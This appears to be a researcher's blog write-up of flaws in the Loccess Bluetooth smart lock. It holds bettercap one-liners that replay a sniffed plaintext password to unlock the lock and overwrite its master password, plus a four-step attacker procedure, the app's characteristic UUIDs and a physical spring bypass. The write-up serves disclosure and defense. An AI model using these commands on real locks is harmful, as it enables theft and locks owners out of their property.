Don't worry about being locked with Loccess

The Loccess smart lock is marketed as a lock for luggage, bicycles and lockers. Besides a keypad on the bottom of the device, it can also be opened from your smartphone over BLE.
I was able to get this smart lock at Amazon for around $20.

I installed the Android app and, after reading the installation manual, it seems that the factory code for opening the lock is 000000.

So, to make things different, I opened the Loccess with the default code just by using bettercap (the short manual doesn't tell the user to change the password, and the mobile app doesn't force it either):

It JustWorks! By pure luck, the first writable characteristic (handle 0x000e) gives us the open sesame operation.

One thing I need to mention is that the Loccess has a wake-up button: you need to press it before it advertises. But if you think about it, a malicious user who wants to steal something has to be close to the device anyway, so pressing a button would not be a problem.

What happens if a user changes the default password? I changed it to a strong password (not): 123456.

Before sniffing, I tried the factory password again, just to see if there was one key to rule them all, but it didn't work.

Ubertooth caught something interesting. When the victim opens the lock, the following request is captured in plaintext:

Look at the new password. If we update our request with it and send it through bettercap, it will open the Loccess. You can use a one-liner for that:

sudo bettercap -eval "net.recon off;ble.recon on;sleep 2;ble.write E9:7F:8C:XX:XX:XX 6e400002b5a3f393e0a9e50e24dcca9e 313233343536;sleep 2;q"

You can even sniff the authentication from the admin:

Handle 0x0014 deals with the login username/password:

After getting this access, you can change the 4-digit button pincode and the master password, and reset the lock to factory values.

Forcing the requests without the login/password will not work.
If the attacker obtains the login/password combo and changes the master password and the button pincode, I don't know how the victim could open the lock again (without breaking it).

Taking the last pcap from Wireshark, let's PoC it with bettercap and change the master password to 666666:

sudo bettercap -eval "net.recon off;ble.recon on;sleep 2;ble.write E9:7F:8C:XX:XX:XX 6e400004b5a3f393e0a9e50e24dcca9e xxxxxxxx33000000000531323334353600000006;sleep 2;ble.write E9:7F:8C:XX:XX:XX 6e400005b5a3f393e0a9e50e24dcca9e 363636363636;sleep 2;q"

From an attacker's point of view:

  1. Press the wake-up button
  2. Send a BLE request with the factory password
  3. If that doesn't work, sniff the traffic between the victim's phone and the Loccess
  4. Use the new password (or change the existing one) and open the lock
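As an added illustration (not code from the original post or from Loccess), the following Python model contrasts the scheme just described, where the ATT write value is the password itself, with a hypothetical nonce-based challenge-response: the sniffed write replays against the first, while a captured response fails against the second. The HMAC-SHA256 choice, the 16-byte nonce and the shared key are assumptions.

```python
import hashlib
import hmac
import os

def decode_write(hex_payload: str) -> str:
    # The writes captured above carry the password as ASCII digits.
    return bytes.fromhex(hex_payload).decode("ascii")

class PlaintextLock:
    """Model of the scheme seen on the lock: the write value is the password itself,
    so a sniffed write can be sent again verbatim."""
    def __init__(self, password: str):
        self._password = password.encode("ascii")

    def write_unlock(self, value: bytes) -> bool:
        return hmac.compare_digest(value, self._password)

class ChallengeResponseLock:
    """Hypothetical hardened design (not the vendor's): the lock hands out a random
    nonce, the phone answers HMAC-SHA256(shared_key, nonce), and the nonce is
    consumed after one attempt, so a captured response is useless later."""
    def __init__(self, shared_key: bytes):
        self._key = shared_key
        self._pending = None

    def read_challenge(self) -> bytes:
        self._pending = os.urandom(16)  # fresh per unlock attempt
        return self._pending

    def write_unlock(self, value: bytes) -> bool:
        if self._pending is None:
            return False  # no challenge outstanding
        expected = hmac.new(self._key, self._pending, hashlib.sha256).digest()
        self._pending = None  # single use: the same response cannot be replayed
        return hmac.compare_digest(value, expected)

def phone_response(shared_key: bytes, nonce: bytes) -> bytes:
    return hmac.new(shared_key, nonce, hashlib.sha256).digest()

def replay_demo() -> tuple:
    # Returns (replay works on plaintext lock, fresh response works, replay works on hardened lock).
    sniffed = bytes.fromhex("313233343536")  # captured write from the post: ASCII "123456"
    weak = PlaintextLock("123456")
    key = hashlib.sha256(b"constructed shared key").digest()  # constructed example key
    strong = ChallengeResponseLock(key)
    response = phone_response(key, strong.read_challenge())
    fresh_ok = strong.write_unlock(response)
    strong.read_challenge()  # a later session issues a new nonce
    return weak.write_unlock(sniffed), fresh_ok, strong.write_unlock(response)
```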

Regarding the mobile app from Loccess, it's quite simple and doesn't have a lot of unnecessary code.

First, the permissions of the mobile app:

<uses-permission android:name="android.permission.READ_EXTERNAL_STORAGE" />
<uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE" />
<uses-permission android:name="android.permission.BLUETOOTH" />
<uses-permission android:name="android.permission.BLUETOOTH_PRIVILEGED" />
<uses-permission android:name="android.permission.BLUETOOTH_ADMIN" />
<uses-permission android:name="android.permission.WAKE_LOCK" />
<uses-permission android:name="android.permission.VIBRATE" />

In com.loccess.utils.Constants you have all the characteristic UUIDs you need:

    public static String LOCK_CHARACTERISTIC_BATTERY = "6E400008-B5A3-F393-E0A9-E50E24DCCA9E";
    public static String LOCK_CHARACTERISTIC_KEYBOARD_PWD = "6E400009-B5A3-F393-E0A9-E50E24DCCA9E";
    public static String LOCK_CHARACTERISTIC_LOGIN = "6E400004-B5A3-F393-E0A9-E50E24DCCA9E";
    public static String LOCK_CHARACTERISTIC_MODIFY_PASSWORD = "6E400005-B5A3-F393-E0A9-E50E24DCCA9E";
    public static String LOCK_CHARACTERISTIC_REGISTER = "6E400003-B5A3-F393-E0A9-E50E24DCCA9E";
    public static String LOCK_CHARACTERISTIC_UNLOCK = "6E400002-B5A3-F393-E0A9-E50E24DCCA9E";

No requests are made to the outside and the data is stored locally:

private static final String DB_NAME = "lockdevice.db";

(...)

private static final String TABLE_CREATE = "create table tbl_lockdevice ( id INTEGER PRIMARY KEY AUTOINCREMENT, name TEXT, address TEXT UNIQUE, password TEXT, battery INTEGER DEFAULT 0, warning INTEGER DEFAULT 1, ring INTEGER DEFAULT 0, read_lock_status INTEGER DEFAULT 0, auto_unlock INTEGER DEFAULT 0 )";

Like the other lock that I already tested on my personal blog, where I opened the fingerprint lock by directly powering the rotor, I wanted to do something similar.
The lock itself doesn't seem so robust and seems to have a small spring that I was able to see in the FCC ID internal photos.
If I can move that spring, I will be able to open the lock. So I grabbed my Kudu knife and... check out the following video:

In conclusion, I had a lot of fun playing with this smart lock, and it's right around the budget limit to be on eyeohtee.cheap :)

Sponsored by: Char49
